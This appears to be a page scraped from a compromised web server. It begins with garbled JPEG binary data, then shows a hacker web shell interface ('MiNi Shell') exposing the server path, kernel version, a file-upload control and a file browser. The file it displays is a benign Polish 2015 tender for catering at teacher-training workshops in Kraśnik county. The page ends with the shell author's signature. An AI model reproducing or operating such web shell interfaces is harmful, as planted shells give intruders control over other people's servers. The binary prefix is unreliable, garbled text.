JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150212/19251-N-2015.html

<p class="kh_header"><b>Kraśnik: Sukcesywne świadczenie usług cateringowych dla uczestników cyklu szkoleń/warsztatów prowadzonych przez  ekspertów    zewnętrznych  wspomagających    proces doskonalenia nauczycieli i  dyrektorów biorących udział w sieciach współpracy i  samokształcenia w ramach  projektu  pn. Kompleksowy  system  doskonalenia  nauczycieli w powiecie kraśnickim</b><br>
<b>Numer ogłoszenia: 19251 - 2015; data zamieszczenia: 12.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Kraśnicki , al. Niepodległości 20, 23-210 Kraśnik, woj. lubelskie, tel. 081 8255889, faks 081 8255052.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne świadczenie usług cateringowych dla uczestników cyklu szkoleń/warsztatów prowadzonych przez  ekspertów    zewnętrznych  wspomagających    proces doskonalenia nauczycieli i  dyrektorów biorących udział w sieciach współpracy i  samokształcenia w ramach  projektu  pn. Kompleksowy  system  doskonalenia  nauczycieli w powiecie kraśnickim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia jest usługa - sukcesywne świadczenie usług cateringowych dla uczestników cyklu szkoleń/warsztatów prowadzonych przez  ekspertów    zewnętrznych  wspomagających    proces    doskonalenia    nauczycieli i  dyrektorów biorących udział
w sieciach współpracy i  samokształcenia w ramach  projektu  pn. Kompleksowy  system  doskonalenia  nauczycieli w powiecie kraśnickim, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III. Wysoka jakość systemu oświaty, Działanie 3.5.  Kompleksowe wspomaganie rozwoju szkół.
3.2. W ramach świadczenia usług cateringowych wykonawca jest zobowiązany do sukcesywnego przygotowania i dostarczenia w miejsca wskazane przez Zamawiającego cateringu. Wykonawca przewiduje 28 szkoleń/warsztatów oraz maksymalną ilość zestawów - 700 szt.
3.3. Przedmiotem zamówienia objęci zostaną uczestnicy 7 sieci współpracy i samokształcenia, których szkolenia odbędą się na terenie wybranych szkół/przedszkoli Powiatu Kraśnickiego, biorących udział w projekcie, tj. m.in. : I Liceum Ogólnokształcące w Kraśniku, ul. Armii Krajowej, 23 -200 Kraśnik; II Liceum Ogólnokształcące w Kraśniku, ul. Gen. Wł. Sikorskiego 25, 23-200 Kraśnik;Technikum Nr 3 w Kraśniku, ul. Słowackiego 7, 23 - 210 Kraśnik; Gimnazjum w Stróży, 23 - 206 Stróża; Szkoła Podstawowa w Księżomierzu,
ul. Kościelna 14,  23 - 275  Gościeradów, Szkoła Podstawowa w Grabówce, 23 - 235  Annopol; Technikum w Wólce Gościeradowskiej, Wólka Gościeradowska 72 A,
23-275 Gościeradów.
       Przedmiot zamówienia będzie realizowany sukcesywnie w partiach w trakcie realizacji projektu  pn.  Kompleksowy system  doskonalenia  nauczycieli  w  powiecie  kraśnickim realizowanego przez Powiat Kraśnicki. Zamawiający poinformuje Wykonawcę na 5 dni przed planowanym terminem realizacji szkoleń o terminie, miejscu i szacunkowej liczbie uczestników oraz o ostatecznym menu z opcji do wyboru wskazanych poniżej. Ostateczną liczbę uczestników szkolenia Zamawiający poda Wykonawcy 2 dni przed szkoleniem.
       Catering będzie obejmował maksymalnie 700 zestawów, na które składają się danie ciepłe i serwis kawowy. Przez  jeden  zestaw  Zamawiający  rozumie  jedną  porcję  posiłku  oraz  serwisu  kawowego przypadającą na jedną osobę z wymienionych poniżej elementów:
1) serwis kawowy: na jeden zestaw przypadający na 1 osobę składają się: 2 filiżanki (150 ml) kawy rozpuszczalnej lub kawy świeżo  mielonej lub herbaty czarnej lub herbaty owocowej lub herbaty zielonej zamiennie do wyboru przez każdego uczestnika, dodatki: cukier, mleko (nie mniej niż 2%), cytryna w plasterkach do wyboru przez każdego uczestnika oraz woda gazowana  i  niegazowana w  butelkach (co  najmniej 500  ml wody mineralnej  na osobę). Ciastka: biszkopty z nadzieniem w czekoladzie, wafle przekładane kremem, ciastka maślane (co najmniej 100 g w  zestawie),
2) dania ciepłe: na 1 osobę składają się dania do wyboru:
-    gulasz, pieczywo, sok  100% - 250 ml lub
-    bigos, pieczywo, sok  100% - 250 ml lub
-    mięso wieprzowe z sosem i gotowanymi ziemniakami/frytkami/kaszą, surówka, sok 100% - 250 ml lub
-    ryba smażona z gotowanymi ziemniakami/frytkami, surówka, sok 100% -
250 ml lub
-    pierogi ruskie, surówka, sok 100 % - 250 ml lub
-    pierogi z kapustą, surówka, sok 100% - 250 ml.
Łączna gramatura dania ciepłego powinna wynosić nie mniej niż 600 g  na 1 zestaw.
Zamawiający nie dopuszcza możliwości wydawania posiłków z półproduktów. Posiłki powinny  być  przygotowane  z  surowców  świeżych  i wysokiej  jakości  z  zachowaniem reżimów dietetycznych i sanitarnych. Wykonawca  zobowiązany  jest  do:  przestrzegania  przepisów  prawnych  w zakresie przechowywania  i  przygotowywania  artykułów  spożywczych  (m.  in.  ustawy  z  dnia  25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia - Dz. U. z 2010 r. Nr 136, poz. 914 z późn. zm.), odbioru i zagospodarowania odpadów spożywczych (pokonsumpcyjnych) powstałych w trakcie świadczenia usługi, uporządkowania sali, w której była świadczona usługa. Catering obowiązywać  będzie według  ustalonych wcześniej godzin.  Serwis kawowy powinien funkcjonować na 15 minut przed rozpoczęciem szkoleń. W koszt  usługi  wchodzi  przygotowanie  i  dowóz  posiłków i  serwisu  kawowego  na miejsce, ich wydanie o temperaturze odpowiedniej do danego rodzaju potrawy, niezwłoczne usuwanie po każdym posiłku brudnych naczyń i resztek pokarmowych oraz, w przypadku zastawy stołowej niejednokrotnego użytku, ich mycie i wyparzanie. Wykonawca zobowiązany jest do świadczenia usług cateringowych przy użyciu sprzętu gastronomicznego  zapewniającego  utrzymanie  odpowiedniej  temperatury  posiłków, podawania potraw na odpowiednich naczyniach (porcelanowe, jednorazowe) z użyciem odpowiednich sztućców (metalowych, plastikowych) oraz materiałowe obrusy do nakrycia stołów i serwetki papierowe. Zamawiający zastrzega sobie możliwość zamówienia mniejszej usługi, niż maksymalna wskazana  w  opisie  przedmiotu  zamówienia  i  zapłaty  za  faktycznie  dostarczoną  usługę. W takiej sytuacji rozliczenie między stronami nastąpi zgodnie z rzeczywistym wykonaniem przedmiotu  umowy.  Wykonawca  nie  będzie  wnosił  żadnych  roszczeń  z  tego  tytułu,w szczególności o zapłatę stanowiącą różnicę między maksymalna ilością usług wskazanych w opisie przedmiotu zamówienia, a ilością faktycznie zrealizowaną. Zamawiający  zastrzega,  że  usługi  cateringowe  mogą  być  świadczone  jednocześnie w tym samym dniu i godzinie w kilku szkołach/przedszkolach. Wykonawca  zobowiązuje  się  do  realizacji  usługo  najwyższej  jakości  i w razie zastrzeżeń dostosuje się do wytycznych Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.32.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału                                 w postępowaniu określonych w art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału                                 w postępowaniu określonych w art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału                                 w postępowaniu określonych w art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału                                 w postępowaniu określonych w art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału                                 w postępowaniu określonych w art. 22 ust. 1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Sposób realizacji zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany umowy w zakresie i na warunkach przewidzianych w przepisach ustawy Prawo zamówień publicznych, w następujących przypadkach:
1) Termin wykonania zamówienia:
a) zaistnienie w trakcie realizacji umowy przestojów i opóźnień zawinionych przez Zamawiającego,
b) działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonywania usług,
2) Sposób i warunki płatności:
a) w związku z powstałą po zawarciu umowy sytuacją braku środków Zamawiającego na sfinansowanie wykonania umowy zgodnie z pierwotnie określonymi warunkami,
b) w sytuacjach wynikających ze specyfiki działalności Zamawiającego,
c) w sytuacji zmiany terminu wykonania przedmiotu umowy.
3) Wysokości wynagrodzenia:
a) zmiana obowiązujących stawek podatku VAT,
c) zmiany w przepisach prawa mające wpływ na wysokość wynagrodzenia.
2. Wszelkie zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatkrasnicki.pl, www.powiatkrasnik.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Kraśniku, Al. Niepodległości 20, 23-210 Kraśnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2015 godzina 10:00, miejsce: Starostwo Powiatowe w Kraśniku, Al. Niepodległości 20, 23-210 Kraśnik, pok. 101, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Kompleksowy system doskonalenia nauczycieli w powiecie kraśnickim
współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com